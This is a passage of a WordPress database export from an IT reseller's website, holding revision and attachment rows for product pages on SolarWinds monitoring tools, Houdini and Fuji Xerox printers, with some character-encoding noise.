minutes.\r\n\r\n<strong>Key Features</strong>\r\n<ul class=\"producthero--features-list\">\r\n 	<li>Predictive Recommendations</li>\r\n 	<li>VM Sprawl Control</li>\r\n 	<li>Comprehensive virtualization management</li>\r\n 	<li>Powerful capacity planning tools</li>\r\n 	<li>Manage across on-premise, hybrid, and cloud</li>\r\n 	<li>Visibility across the application stack</li>\r\n</ul>\r\n3.Â <strong>Storage Resource Monitor</strong>\r\n\r\nStorage management software built with multi-vendor performance monitoring.\r\n\r\n<strong>Key Features</strong>\r\n<ul>\r\n 	<li>Multi-vendor storage device support</li>\r\n 	<li>Storage performance monitoring and hotspot detection</li>\r\n 	<li>Automated storage capacity planning</li>\r\n 	<li>Increased visibility across your storage infrastructure and beyond</li>\r\n 	<li>Cross-stack IT data correlation</li>\r\n</ul>\r\n4. <strong>Server Configuration Monitor</strong>\r\n\r\nServer configuration and change monitoring tool that\'s built to be easy to use.\r\n\r\n<strong>Key Features</strong>\r\n<ul class=\"producthero--features-list\">\r\n 	<li>Track system and application changes</li>\r\n 	<li>Compare configuration changes over time</li>\r\n 	<li>Correlate configuration changes to performance</li>\r\n 	<li>Asset inventory</li>\r\n 	<li>Orion Platform integration</li>\r\n</ul>\r\n5.Â <strong>Application Performance Monitor</strong>\r\n\r\nExtending Server &amp; Application Monitor with in-depth performance monitoring of your custom applications.\r\n\r\n<strong>Key Features</strong>\r\n<ul class=\"producthero--features-list\">\r\n 	<li>Monitor your custom .NET applications running on Microsoft IIS</li>\r\n 	<li>Integrated with Server &amp; Application Monitor</li>\r\n 	<li>Response Time Heat Map</li>\r\n 	<li>Transaction Performance Monitoring</li>\r\n 	<li>Distributed Transaction Tracing</li>\r\n 	<li>Trace Details</li>\r\n</ul>\r\n6.Â <strong>Web Performance Monitor</strong>\r\n\r\nWebsite monitoring software built for comprehensive web and SaaS application performance monitoring.\r\n\r\n<strong>Key Features</strong>\r\n<ul>\r\n 	<li>Complete performance monitoring</li>\r\n 	<li>Continuous synthetic transaction monitoring</li>\r\n 	<li>Detailed load-time metrics</li>\r\n 	<li>Monitor from multiple locations</li>\r\n 	<li>Browser-based transaction recorder</li>\r\n 	<li>Transaction recording</li>\r\n</ul>\r\n7.Â <strong>SolarWinds Backup</strong>\r\n\r\nServer backup software designed to be modern and reliable, without the cost and complexity.\r\n\r\n<strong>Key Features</strong>\r\n<ul class=\"producthero--features-list\">\r\n 	<li>Unified, cloud-based backup service for physical and virtual servers</li>\r\n 	<li>Robust and reliable enough to handle even large machines and applications</li>\r\n 	<li>Fast backup and rapid restore with built-in compression and deduplication</li>\r\n 	<li>Simple, at-a-glance status dashboard eliminates manual checking</li>\r\n 	<li>Global, purpose-built, private cloud included</li>\r\n 	<li>Low TCO with no hidden costs</li>\r\n</ul>\r\n<h3>DATABASE MANAGEMENT</h3>\r\n<ol>\r\n 	<li><strong>Server &amp; Application Monitor</strong></li>\r\n</ol>\r\nServer monitoring software built to find and resolve application problems.\r\n\r\n<strong>Key Features</strong>\r\n<ul class=\"producthero--features-list\">\r\n 	<li>Get started typically in minutes</li>\r\n 	<li>Infrastructure monitoring for Azure and AWS</li>\r\n 	<li>1200+ systems and application performance monitoring templates</li>\r\n 	<li>Intelligent application infrastructure dependency mapping</li>\r\n 	<li>Built-in virtualization monitoring</li>\r\n 	<li>Storage performance and health</li>\r\n</ul>\r\n2.Â <strong>Storage Resource Monitor</strong>\r\n\r\nStorage management software built with multi-vendor performance monitoring.\r\n\r\n<strong>Key Features</strong>\r\n<ul class=\"producthero--features-list\">\r\n 	<li>Multi-vendor storage device support</li>\r\n 	<li>Storage performance monitoring and hotspot detection</li>\r\n 	<li>Automated storage capacity planning</li>\r\n 	<li>Increased visibility across your storage infrastructure and beyond</li>\r\n 	<li>Cross-stack IT data correlation</li>\r\n</ul>\r\n<h3>IT SECURITY</h3>\r\n<ol>\r\n 	<li><strong>Access Rights Manager</strong></li>\r\n</ol>\r\nManage and audit access rights across your IT infrastructure.\r\n\r\n<strong>Key Features</strong>\r\n<ul class=\"producthero--features-list\">\r\n 	<li>Monitoring of Active Directory</li>\r\n 	<li>Auditing for Windows File Share</li>\r\n 	<li>Monitoring of Microsoft Exchange</li>\r\n 	<li>SharePoint access monitoring and management</li>\r\n 	<li>User provisioning and management</li>\r\n 	<li>User permissions analysis</li>\r\n</ul>\r\n2.Â <strong>Threat Monitor - IT Ops Edition</strong>\r\n\r\nMonitor, respond, and report security threats in near real time.\r\n\r\n<strong>Key Features</strong>\r\n<ul class=\"producthero--features-list\">\r\n 	<li>Continuously updated threat intelligence</li>\r\n 	<li>Security Information and Event Manager (SIEM)</li>\r\n 	<li>Log correlation</li>\r\n 	<li>Log event archive</li>\r\n 	<li>Network and Host Intrusion Detection System</li>\r\n 	<li>Highly indexed log search capabilities</li>\r\n</ul>\r\n3.Â <strong>Log &amp; Event Manager</strong>\r\n\r\nSIEM tools make it easier to use event logs for security, compliance, and troubleshooting.\r\n\r\n<strong>Key Features</strong>\r\n<ul class=\"producthero--features-list\">\r\n 	<li>Integrated compliance reporting tools</li>\r\n 	<li>Event-time correlation of security events</li>\r\n 	<li>Automated threat remediation</li>\r\n 	<li>Advanced search and forensic analysis</li>\r\n 	<li>File integrity monitoring</li>\r\n 	<li>USB device monitoring</li>\r\n</ul>\r\n4.Â <strong>Serv-U File Transfer Protocol Server</strong>\r\n\r\nSimple, affordable, easy-to-use FTP server software.\r\n\r\n<strong>Key Features</strong>\r\n<ul class=\"producthero--features-list\">\r\n 	<li>File transfer using FTP and FTPS</li>\r\n 	<li>Quick and easy file transfers from the web and mobile devices</li>\r\n 	<li>Transfer multiple and large files easily</li>\r\n 	<li>Simple file transfer administration and management</li>\r\n 	<li>Secure gateway helps avoid data at rest in DMZ networks</li>\r\n 	<li>Easily manage file transfer settings and permissions</li>\r\n</ul>\r\n5.Â <strong>Patch Manager</strong>\r\n\r\nPatch management software designed for quickly addressing software vulnerabilities.\r\n\r\n<strong>Key Features</strong>\r\n<ul class=\"producthero--features-list\">\r\n 	<li>Microsoft WSUS patch management</li>\r\n 	<li>Integrations with SCCM</li>\r\n 	<li>Vulnerability management</li>\r\n 	<li>Pre-built/pre-tested packages</li>\r\n 	<li>Patch compliance reports</li>\r\n 	<li>Patch status dashboard</li>\r\n</ul>\r\n6.Â <strong>Serv-U Managed File Transfer Server</strong>\r\n\r\nEnhance security and control over file transfers in and outside your organization.\r\n\r\n<strong>Key Features</strong>\r\n<ul class=\"producthero--features-list\">\r\n 	<li>Reliable FTP server software for secure file transfer</li>\r\n 	<li>Ad hoc file sharing to easily send and request files</li>\r\n 	<li>Anywhere, anytime file transfer from web and mobile devices</li>\r\n 	<li>Upload and download large files quickly and easily</li>\r\n 	<li>Centralized file transfer management and automation</li>\r\n 	<li>Maintain regulatory compliance</li>\r\n</ul>\r\n<h3>IT HELP DESK</h3>\r\n<ol>\r\n 	<li><strong>Web Help Desk</strong></li>\r\n</ol>\r\nAffordable Help Desk Ticketing and Asset Management Software.\r\n\r\n<strong>Key Features</strong>\r\n<ul class=\"producthero--features-list\">\r\n 	<li>Automate ticketing management</li>\r\n 	<li>Centralize your knowledge management</li>\r\n 	<li>Meet your SLAs</li>\r\n 	<li>Relational ticket association to simplify project and task management</li>\r\n 	<li>Native integration with Active Directory and LDAP</li>\r\n 	<li>Measure customer satisfaction</li>\r\n</ul>\r\n2.Â <strong>Dameware Remote Support</strong>\r\n\r\nRemote control and systems management tools in one easy-to-use package.\r\n\r\n<strong>Key Features</strong>\r\n<ul>\r\n 	<li>Fast and secure remote control</li>\r\n 	<li>Anywhere, anytime remote assistance</li>\r\n 	<li>Simplify Windows administration</li>\r\n 	<li>Built-in remote admin tools</li>\r\n 	<li>Deliver remote support from iOS and Android devices</li>\r\n 	<li>Remotely manage Active Directory environments</li>\r\n</ul>\r\n3.Â <strong>Dameware Mini Remote Control</strong>\r\n\r\nAffordable remote control software for all your customer support and help desk needs.\r\n\r\n<strong>Key Features</strong>\r\n<ul>\r\n 	<li>Multi-platform desktop sharing and remote control</li>\r\n 	<li>Remote access to sleeping and powered-off computers</li>\r\n 	<li>Multi-factor authentication</li>\r\n 	<li>Flexible user access control</li>\r\n 	<li>Customize and automatically deploy remote control agents</li>\r\n 	<li>Remote session tools and utilities</li>\r\n</ul>\r\n4.Â <strong>Mobile Admin</strong>\r\n\r\nGet help simplifying IT administration and management from your mobile device.\r\n\r\n<strong>Key Features</strong>\r\n<ul class=\"producthero--features-list\">\r\n 	<li>SolarWinds OrionÂ® Platform integration</li>\r\n 	<li>Active Directory</li>\r\n 	<li>Virtualization management</li>\r\n 	<li>Email server management</li>\r\n 	<li>Backup management</li>\r\n 	<li>Remote access</li>\r\n</ul>\r\nTo discover more about this product, please click the button below or contact us to discuss your needs.\r\n\r\n[maxbutton id=\"1\" ]\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;','Solarwinds','','inherit','closed','closed','','1597-revision-v1','','','2018-12-17 15:13:28','2018-12-17 07:13:28','',1597,'https://bintara.com.my/blog/2018/12/17/1597-revision-v1/',0,'revision','',0),(2299,1,'2018-12-17 15:16:52','2018-12-17 07:16:52','Houdini is built from the ground up to be a procedural system that empowers artists to work freely, create multiple iterations and rapidly share workflows with colleagues.\r\n<div class=\"display\">\r\n<h3>FLEXIBLE</h3>\r\n<h4>Node-based Workflow</h4>\r\n</div>\r\nIn Houdini, every action is stored in a node. These nodes are then â€œwiredâ€ into networks which define a â€œrecipeâ€ that can be tweaked to refine the outcome then repeated to create similar yet unique results. The ability for nodes to be saved and to pass information, in the form of attributes, down the chain is what gives Houdini its procedural nature.\r\n<h3>INTUITIVE</h3>\r\n<h4>Artist Friendly Tools</h4>\r\nWhile the nodes are what makes Houdini unique and give it power, there are lots of viewport and shelf tools that allow for artist-friendly viewport interactions. Behind the scenes, Houdini builds up the nodes and networks for you. Houdini let\'s artists explore different creative paths because it is easy to branch off a new node to explore alternative solutions.\r\n<div class=\"display\">\r\n<h3>NEXT LEVEL</h3>\r\n<h4>VFX &amp; Simulation</h4>\r\n</div>\r\nVisual effects artists gravitate to Houdini because its procedural workflow is ideal for creating sophisticated particle and dynamic simulations. Effects are typically designed to react to actions taking place in a shot and a procedural solution â€œautomatesâ€ these reactions providing studios with more creative control and more rapid turnaround.\r\n<div class=\"display\">\r\n<h3>DIRECTABLE</h3>\r\n<h4>Shots &amp; Multiple Iterations</h4>\r\n</div>\r\nHoudini lets you make creative decisions deep into production as changes made to Houdini nodes cascade through the network to create a new and unique result. This directability is retained throughout the creative process and can be used to make last minute decisions that would be too costly in a traditional CG pipeline.\r\n<div class=\"display\">\r\n<h3>POWERFUL</h3>\r\n<h4>Pipeline in a Box</h4>\r\n</div>\r\nWhether you are setting up a shot or building a game level, Houdini lets you create tools that can be reused many times during a projectâ€™s life cycle. Instead of simply reacting to issues and problems, you will be able to plan ahead and visualize and refine your pipeline.\r\n<div class=\"display\">\r\n<h3>ROBUST</h3>\r\n<h4>Asset Creation Tools</h4>\r\n</div>\r\nA big benefit of Houdiniâ€™s node-based approach is the ability to encapsulate node networks into custom nodes that are shareable. Create these digital assets without writing any code then share them with other Houdini artists.\r\n\r\nWith the Houdini Engine, open assets in other applications such as Autodesk Maya, Autodesk 3ds Max, C4D, UE4 and Unity with the assetâ€™s procedural controls available for editing in the host app.\r\n\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]','Houdini','','inherit','closed','closed','','1526-revision-v1','','','2018-12-17 15:16:52','2018-12-17 07:16:52','',1526,'https://bintara.com.my/blog/2018/12/17/1526-revision-v1/',0,'revision','',0),(2301,1,'2018-12-17 15:27:46','2018-12-17 07:27:46','<h3>Printers</h3>\r\nExceptional print quality, productivity and ease of use.\r\n\r\nFuji Xerox printers and all-in-one printers are ideal fit for both small &amp; medium business environments, whether you need vibrant color, black-and-white printing, or more robust features to handle sophisticated document workflows. All of our printers and desktop all-in-one printers offer built-in productivity and reliability you can count on.\r\n<h3>Multifunction Printers</h3>\r\nPrint, copy, scan and fax all in one device.\r\n\r\nFuji Xerox multifunction printers (MFPs) deliver flexibility with print, copy, scan and fax all from one device. Additional features like device embedded solutions and cloud-based solutions that help you handle various information efficiently, while also meeting your security requirements. Now you can have the freedom to work in the most efficient and productive way, saving time and resources.\r\n\r\nNo matter which multifunction printer you choose, youâ€™ll get easy-to-use interfaces, reliable paper handling, advanced security and sophisticated tools for adding required flexibility and efficiency in your regular jobs. Designed to handle your workgroupâ€™s high volumes, Fuji Xerox multifunction printers can automate repetitive tasks and customize workflows.\r\n<h3>Production Print</h3>\r\nDigital press models in full colour, monochrome or spot colour deliver benchmark print quality and productivity.\r\n\r\nFuji Xerox provides solutions in the graphic communications, in-plant and production print environments with high-volume printing requirements. These solutions enable on-demand printing of a wide range of applications, including publishing, transaction printing, direct mail, print-on-demand, short runs, packaging, photo publishing and marketing collateral. Our high-volume digital printing press models and production printers are available in full color or monochrome and combine vibrant quality with high speed and productivity. A coordinated approach of print and digital media is used to deliver messages and information efficiently and effectively, by utilizing on-demand printing and various printing technologies to timely communicate relevant information to target customers. As a global partner in developing compelling communication that captures attention and encourages response from customers, Fuji Xerox delivers personalized content to customers through collaborations with partner companies in the industry.\r\n<h3>SOFTWARE</h3>\r\nYour multifunction printer may already print, copy, scan and fax. But when you add software solutions to the equation, you\'ll multiply your productivity and create aÂ transformational experience. Simplify and automate your everyday work, better manage your information, improve document security, enable easy scanning, and get the most out of your hardware investment as you continue your digital journey.\r\n<h3>WIDE FORMAT</h3>\r\nFulfil your large format A0 print and scan requirements with Fuji Xerox wide format multifunction printers. Constant growing needs of digitalization and connected devices in Engineering departments can be effectively managed with Fuji Xerox DocuWide series coming with in-build high speed, high-resolution color scanner and excellent quality print output.\r\n<h3>SCANNERS</h3>\r\nFuji Xerox scanners provide the digital on-ramp for businesses to transform their hard-copy documents into an efficient document management solution. Our wide range of scanners are able to cover needs starting from small businesses to professional users with very high speed scanning requirements. While hardware may just be the beginning of your scanning requirement, Fuji Xeroxâ€™s leading document management software accompanying these devices beautifully complements its hardware to simplify and automate your processes at no extra cost.\r\n\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]','Fuji Xerox','','inherit','closed','closed','','1482-revision-v1','','','2018-12-17 15:27:46','2018-12-17 07:27:46','',1482,'https://bintara.com.my/blog/2018/12/17/1482-revision-v1/',0,'revision','',0),(3566,1,'2019-09-30 14:32:41','2019-09-30 06:32:41','<h2>Printers</h2>\n<strong>Exceptional print quality, productivity and ease of use.</strong>\n\nFuji Xerox printers and all-in-one printers are ideal fit for both small &amp; medium business environments, whether you need vibrant color, black-and-white printing, or more robust features to handle sophisticated document workflows. All of our printers and desktop all-in-one printers offer built-in productivity and reliability you can count on.\n\n<h2>Multifunction Printers</h2>\nPrint, copy, scan and fax all in one device.\n\nFuji Xerox multifunction printers (MFPs) deliver flexibility with print, copy, scan and fax all from one device. Additional features like device embedded solutions and cloud-based solutions that help you handle various information efficiently, while also meeting your security requirements. Now you can have the freedom to work in the most efficient and productive way, saving time and resources.\n\nNo matter which multifunction printer you choose, youâ€™ll get easy-to-use interfaces, reliable paper handling, advanced security and sophisticated tools for adding required flexibility and efficiency in your regular jobs. Designed to handle your workgroupâ€™s high volumes, Fuji Xerox multifunction printers can automate repetitive tasks and customize workflows.\n<h2>Production Print</h2>\nDigital press models in full colour, monochrome or spot colour deliver benchmark print quality and productivity.\n\nFuji Xerox provides solutions in the graphic communications, in-plant and production print environments with high-volume printing requirements. These solutions enable on-demand printing of a wide range of applications, including publishing, transaction printing, direct mail, print-on-demand, short runs, packaging, photo publishing and marketing collateral. Our high-volume digital printing press models and production printers are available in full color or monochrome and combine vibrant quality with high speed and productivity. A coordinated approach of print and digital media is used to deliver messages and information efficiently and effectively, by utilizing on-demand printing and various printing technologies to timely communicate relevant information to target customers. As a global partner in developing compelling communication that captures attention and encourages response from customers, Fuji Xerox delivers personalized content to customers through collaborations with partner companies in the industry.\n<h2>Software</h2>\nYour multifunction printer may already print, copy, scan and fax. But when you add software solutions to the equation, you\'ll multiply your productivity and create aÂ transformational experience. Simplify and automate your everyday work, better manage your information, improve document security, enable easy scanning, and get the most out of your hardware investment as you continue your digital journey.\n<h2>Wide Format</h2>\nFulfil your large format A0 print and scan requirements with Fuji Xerox wide format multifunction printers. Constant growing needs of digitalization and connected devices in Engineering departments can be effectively managed with Fuji Xerox DocuWide series coming with in-build high speed, high-resolution color scanner and excellent quality print output.\n<h2>Scanners</h2>\nFuji Xerox scanners provide the digital on-ramp for businesses to transform their hard-copy documents into an efficient document management solution. Our wide range of scanners are able to cover needs starting from small businesses to professional users with very high speed scanning requirements. While hardware may just be the beginning of your scanning requirement, Fuji Xeroxâ€™s leading document management software accompanying these devices beautifully complements its hardware to simplify and automate your processes at no extra cost.\n\n&nbsp;\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>','Fuji Xerox','','inherit','closed','closed','','1482-autosave-v1','','','2019-09-30 14:32:41','2019-09-30 06:32:41','',1482,'https://bintara.com.my/blog/2019/09/30/1482-autosave-v1/',0,'revision','',0),(2302,1,'2018-12-17 15:28:46','2018-12-17 07:28:46','<h3>Printers</h3>\r\nExceptional print quality, productivity and ease of use.\r\n\r\nFuji Xerox printers and all-in-one printers are ideal fit for both small &amp; medium business environments, whether you need vibrant color, black-and-white printing, or more robust features to handle sophisticated document workflows. All of our printers and desktop all-in-one printers offer built-in productivity and reliability you can count on.\r\n<h3>Multifunction Printers</h3>\r\nPrint, copy, scan and fax all in one device.\r\n\r\nFuji Xerox multifunction printers (MFPs) deliver flexibility with print, copy, scan and fax all from one device. Additional features like device embedded solutions and cloud-based solutions that help you handle various information efficiently, while also meeting your security requirements. Now you can have the freedom to work in the most efficient and productive way, saving time and resources.\r\n\r\nNo matter which multifunction printer you choose, youâ€™ll get easy-to-use interfaces, reliable paper handling, advanced security and sophisticated tools for adding required flexibility and efficiency in your regular jobs. Designed to handle your workgroupâ€™s high volumes, Fuji Xerox multifunction printers can automate repetitive tasks and customize workflows.\r\n<h3>Production Print</h3>\r\nDigital press models in full colour, monochrome or spot colour deliver benchmark print quality and productivity.\r\n\r\nFuji Xerox provides solutions in the graphic communications, in-plant and production print environments with high-volume printing requirements. These solutions enable on-demand printing of a wide range of applications, including publishing, transaction printing, direct mail, print-on-demand, short runs, packaging, photo publishing and marketing collateral. Our high-volume digital printing press models and production printers are available in full color or monochrome and combine vibrant quality with high speed and productivity. A coordinated approach of print and digital media is used to deliver messages and information efficiently and effectively, by utilizing on-demand printing and various printing technologies to timely communicate relevant information to target customers. As a global partner in developing compelling communication that captures attention and encourages response from customers, Fuji Xerox delivers personalized content to customers through collaborations with partner companies in the industry.\r\n<h3>Software</h3>\r\nYour multifunction printer may already print, copy, scan and fax. But when you add software solutions to the equation, you\'ll multiply your productivity and create aÂ transformational experience. Simplify and automate your everyday work, better manage your information, improve document security, enable easy scanning, and get the most out of your hardware investment as you continue your digital journey.\r\n<h3>Wide Format</h3>\r\nFulfil your large format A0 print and scan requirements with Fuji Xerox wide format multifunction printers. Constant growing needs of digitalization and connected devices in Engineering departments can be effectively managed with Fuji Xerox DocuWide series coming with in-build high speed, high-resolution color scanner and excellent quality print output.\r\n<h3>Scanners</h3>\r\nFuji Xerox scanners provide the digital on-ramp for businesses to transform their hard-copy documents into an efficient document management solution. Our wide range of scanners are able to cover needs starting from small businesses to professional users with very high speed scanning requirements. While hardware may just be the beginning of your scanning requirement, Fuji Xeroxâ€™s leading document management software accompanying these devices beautifully complements its hardware to simplify and automate your processes at no extra cost.\r\n\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]','Fuji Xerox','','inherit','closed','closed','','1482-revision-v1','','','2018-12-17 15:28:46','2018-12-17 07:28:46','',1482,'https://bintara.com.my/blog/2018/12/17/1482-revision-v1/',0,'revision','',0),(2483,1,'2018-12-18 22:54:48','2018-12-18 14:54:48','','Dameware Mini Remote Control','','inherit','closed','closed','','dameware-mini-remote-control','','','2018-12-18 22:54:48','2018-12-18 14:54:48','',1597,'https://bintara.com.my/wp-content/uploads/2018/12/Dameware-Mini-Remote-Control.png',0,'attachment','image/png',0),(2484,1,'2018-12-18 22:55:27','2018-12-18 14:55:27','','Mobile Admin','','inherit','closed','closed','','mobile-admin','','','2018-12-18 22:55:27','2018-12-18 14:55:27','',1597,'https://bintara.com.my/wp-content/uploads/2018/12/Mobile-Admin.jpg',0,'attachment','image/jpeg',0),(2482,1,'2018-12-18 22:54:11','2018-12-18 14:54:11','','Dameware Remote Support','','inherit','closed','closed','','dameware-remote-support','','','2018-12-18 22:54:11','2018-12-18 14:54:11','',1597,'https://bintara.com.my/wp-content/uploads/2018/12/Dameware-Remote-Support.png',0,'attachment','image/png',0),(2478,1,'2018-12-18 22:51:16','2018-12-18 14:51:16','','Serv-U File Transfer Protocol Server','','inherit','closed','closed','','serv-u-file-transfer-protocol-server','','','2018-12-18 22:51:16','2018-12-18 14:51:16','',1597,'https://bintara.com.my/wp-content/uploads/2018/12/Serv-U-File-Transfer-Protocol-Server.png',0,'attachment','image/png',0),(2479,1,'2018-12-18 22:52:03','2018-12-18 14:52:03','','Patch Manager','','inherit','closed','closed','','patch-manager','','','2018-12-18 22:52:03','2018-12-18 14:52:03','',1597,'https://bintara.com.my/wp-content/uploads/2018/12/Patch-Manager.png',0,'attachment','image/png',0),(2476,1,'2018-12-18 22:49:47','2018-12-18 14:49:47','','Threat Monitor - IT Ops Edition','','inherit','closed','closed','','threat-monitor-it-ops-edition','','','2018-12-18 22:49:47','2018-12-18 14:49:47','',1597,'https://bintara.com.my/wp-content/uploads/2018/12/Threat-Monitor-IT-Ops-Edition.png',0,'attachment','image/png',0),(2477,1,'2018-12-18 22:50:25','2018-12-18 14:50:25','','Â Log & Event Manager','','inherit','closed','closed','','log-event-manager','','','2018-12-18 22:50:25','2018-12-18 14:50:25','',1597,'https://bintara.com.my/wp-content/uploads/2018/12/Log-Event-Manager.png',0,'attachment','image/png',0),(2474,1,'2018-12-18 22:48:34','2018-12-18 14:48:34','','Storage Resource Monitor 1','','inherit','closed','closed','','storage-resource-monitor-1','','','2018-12-18 22:48:34','2018-12-18 14:48:34','',1597,'https://bintara.com.my/wp-content/uploads/2018/12/Storage-Resource-Monitor-1.png',0,'attachment','image/png',0),(2475,1,'2018-12-18 22:49:11','2018-12-18 14:49:11','','Access Rights Manager','','inherit','closed','closed','','access-rights-manager','','','2018-12-18 22:49:11','2018-12-18 14:49:11','',1597,'https://bintara.com.my/wp-content/uploads/2018/12/Access-Rights-Manager.png',0,'attachment','image/png',0),(2471,1,'2018-12-18 22:45:59','2018-12-18 14:45:59','','Web Performance Monitor','','inherit','closed','closed','','web-performance-monitor','','','2018-12-18 22:45:59','2018-12-18 14:45:59','',1597,'https://bintara.com.my/wp-content/uploads/2018/12/Web-Performance-Monitor.png',0,'attachment','image/png',0),(2472,1,'2018-12-18 22:46:39','2018-12-18 14:46:39','','Â SolarWinds Backup','','inherit','closed','closed','','solarwinds-backup','','','2018-12-18 22:46:39','2018-12-18 14:46:39','',1597,'https://bintara.com.my/wp-content/uploads/2018/12/SolarWinds-Backup.png',0,'attachment','image/png',0),(2473,1,'2018-12-18 22:47:35','2018-12-18 14:47:35','','Server & Application Monitor 1','','inherit','closed','closed','','server-application-monitor-1','','','2018-12-18 22:47:35','2018-12-18 14:47:35','',1597,'https://bintara.com.my/wp-content/uploads/2018/12/Server-Application-Monitor-1.png',0,'attachment','image/png',0),(2470,1,'2018-12-18 22:45:17','2018-12-18 14:45:17','','Application Performance Monitor','','inherit','closed','closed','','application-performance-monitor','','','2018-12-18 22:45:17','2018-12-18 14:45:17','',1597,'https://bintara.com.my/wp-content/uploads/2018/12/Application-Performance-Monitor.png',0,'attachment','image/png',0),(2467,1,'2018-12-18 22:42:45','2018-12-18 14:42:45','','Virtualization Manager','','inherit','closed','closed','','virtualization-manager','','','2018-12-18 22:42:45','2018-12-18 14:42:45','',1597,'https://bintara.com.my/wp-content/uploads/2018/12/Virtualization-Manager.png',0,'attachment','image/png',0),(2468,1,'2018-12-18 22:43:43','2018-12-18 14:43:43','','Storage Resource Monitor','','inherit','closed','closed','','storage-resource-monitor','','','2018-12-18 22:43:43','2018-12-18 14:43:43','',1597,'https://bintara.com.my/wp-content/uploads/2018/12/Storage-Resource-Monitor.png',0,'attachment','image/png',0),(2465,1,'2018-12-18 22:41:33','2018-12-18 14:41:33','','VoIP and Network Quality Manager','','inherit','closed','closed','','voip-and-network-quality-manager','','','2018-12-18 22:41:33','2018-12-18 14:41:33','',1597,'https://bintara.com.my/wp-content/uploads/2018/12/VoIP-and-Network-Quality-Manager.png',0,'attachment','image/png',0),(2466,1,'2018-12-18 22:42:06','2018-12-18 14:42:06','','Server & Application Monitor','','inherit','closed','closed','','server-application-monitor','','','2018-12-18 22:42:06','2018-12-18 14:42:06','',1597,'https://bintara.com.my/wp-content/uploads/2018/12/Server-Application-Monitor.png',0,'attachment','image/png',0),(2462,1,'2018-12-18 22:39:02','2018-12-18 14:39:02','','IP Address Manager','','inherit','closed','closed','','ip-address-manager','','','2018-12-18 22:39:02','2018-12-18 14:39:02','',1597,'https://bintara.com.my/wp-content/uploads/2018/12/IP-Address-Manager.png',0,'attachment','image/png',0),(2463,1,'2018-12-18 22:40:09','2018-12-18 14:40:09','','User Device Tracker','','inherit','closed','closed','','user-device-tracker','','','2018-12-18 22:40:09','2018-12-18 14:40:09','',1597,'https://bintara.com.my/wp-content/uploads/2018/12/User-Device-Tracker.png',0,'attachment','image/png',0),(2461,1,'2018-12-18 22:36:30','2018-12-18 14:36:30','','ipMonitor','','inherit','closed','closed','','ipmonitor','','','2018-12-18 22:36:30','2018-12-18 14:36:30','',1597,'https://bintara.com.my/wp-content/uploads/2018/12/ipMonitor.png',0,'attachment','image/png',0),(2460,1,'2018-12-18 22:35:40','2018-12-18 14:35:40','','Network Configuration Manager','','inherit','closed','closed','','network-configuration-manager','','','2018-12-18 22:35:40','2018-12-18 14:35:40','',1597,'https://bintara.com.my/wp-content/uploads/2018/12/Network-Configuration-Manager.png',0,'attachment','image/png',0),(2485,1,'2018-12-18 22:55:49','2018-12-18 14:55:49','<h1>SolarWinds: We Make IT Look Easy</h1>\r\nWe are a leading provider of powerful and affordable IT infrastructure management software. Our products give organizations worldwide, regardless of type, size or IT infrastructure complexity, the power to monitor and manage the performance of their IT environments, whether on-premises, in the cloud, or in hybrid models.\r\n<h2>PRODUCTS</h2>\r\n<h3>NETWORK MANAGEMENT</h3>\r\n<ol>\r\n 	<li><strong>Network Performance MonitorÂ </strong></li>\r\n</ol>\r\n<strong>Â <img class=\"alignnone  wp-image-2459\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Network-Performance-Monitor-.png\" alt=\"\" width=\"388\" height=\"242\" /></strong>\r\n\r\nNetwork monitoring software designed to reduce network outages and improve performance.\r\n\r\n<strong>Key Features</strong>\r\n<ul class=\"producthero--features-list\">\r\n 	<li>Multi-vendor network monitoring</li>\r\n 	<li>Network Insights for deeper visibility</li>\r\n 	<li>Intelligent maps</li>\r\n 	<li>NetPath and PerfStack for easy troubleshooting</li>\r\n 	<li>Smarter scalability for large environments</li>\r\n 	<li>Advanced alerting</li>\r\n</ul>\r\n2.Â <strong>Network Configuration Manager</strong>\r\n\r\n<img class=\"alignnone  wp-image-2460\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Network-Configuration-Manager.png\" alt=\"\" width=\"381\" height=\"238\" />\r\n\r\nAutomate network configuration management and compliance, which can help save time and optimize IT resources.\r\n\r\n<strong>Key Features</strong>\r\n<ul class=\"producthero--features-list\">\r\n 	<li>Network automation</li>\r\n 	<li>Network compliance</li>\r\n 	<li>Configuration backup</li>\r\n 	<li>Vulnerability assessment</li>\r\n 	<li>Network Insights for Cisco ASA and Cisco Nexus</li>\r\n 	<li>Integration with Network Performance Monitor</li>\r\n</ul>\r\n3.Â <strong>ipMonitor</strong>\r\n\r\n<img class=\"alignnone  wp-image-2461\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ipMonitor.png\" alt=\"\" width=\"379\" height=\"237\" />\r\n\r\nEssential up/down and performance monitoring for networks, servers, and applications.\r\n\r\n<strong>Key Features</strong>\r\n<ul class=\"producthero--features-list\">\r\n 	<li>Monitor network devices, servers, and applications from one console</li>\r\n 	<li>Receive alerts for availability and performance issues</li>\r\n 	<li>Monitor network status on maps and NOC view</li>\r\n 	<li>Minimize downtime by automating remediation actions</li>\r\n 	<li>Enhance monitoring with built-in reports and dashboards</li>\r\n</ul>\r\n4.Â <strong>IP Address Manager</strong>\r\n\r\n<img class=\"alignnone  wp-image-2462\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/IP-Address-Manager.png\" alt=\"\" width=\"380\" height=\"237\" />\r\n\r\nIP address management software designed to save time and prevent costly errors.\r\n\r\n<strong>Key Features</strong>\r\n<ul class=\"producthero--features-list\">\r\n 	<li>Automated IP address tracking</li>\r\n 	<li>Integrated DHCP, DNS, and IP address management</li>\r\n 	<li>IP address alerting, troubleshooting, and reporting</li>\r\n 	<li>Multi-vendor on-prem and cloud DHCP and DNS support</li>\r\n 	<li>IP Request Wizard for streamlining and automating IP address requests</li>\r\n 	<li>API support with CRUD operations for two-way integration with third-party software</li>\r\n</ul>\r\n5.Â <strong>User Device Tracker</strong>\r\n\r\n<img class=\"alignnone  wp-image-2463\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/User-Device-Tracker.png\" alt=\"\" width=\"379\" height=\"237\" />\r\n\r\nNetwork device tracking software that can locate users and devices on your network.\r\n\r\n<strong>Key Features</strong>\r\n<ul class=\"producthero--features-list\">\r\n 	<li>Quickly 